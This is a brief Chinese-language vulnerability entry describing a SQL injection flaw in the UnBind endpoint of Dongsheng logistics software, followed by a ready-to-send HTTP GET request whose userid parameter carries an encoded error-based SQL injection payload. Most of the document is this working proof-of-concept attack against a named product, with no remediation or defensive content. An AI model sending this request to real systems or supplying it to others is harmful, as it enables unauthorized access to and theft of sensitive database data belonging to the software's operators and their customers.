漏洞描述
东胜物流软件 UnBind 存在SQL注入漏洞,攻击者可获取数据库敏感数据,造成信息泄露
GET
/Mobile/Login/UnBind?userid=-2963%27+OR+1636+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28120%29%2BCHAR%28113%29%
2BCHAR%2898%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%281636%3D1636%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%
29+END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28113%29%29%29--+oTEn
HTTP/1.1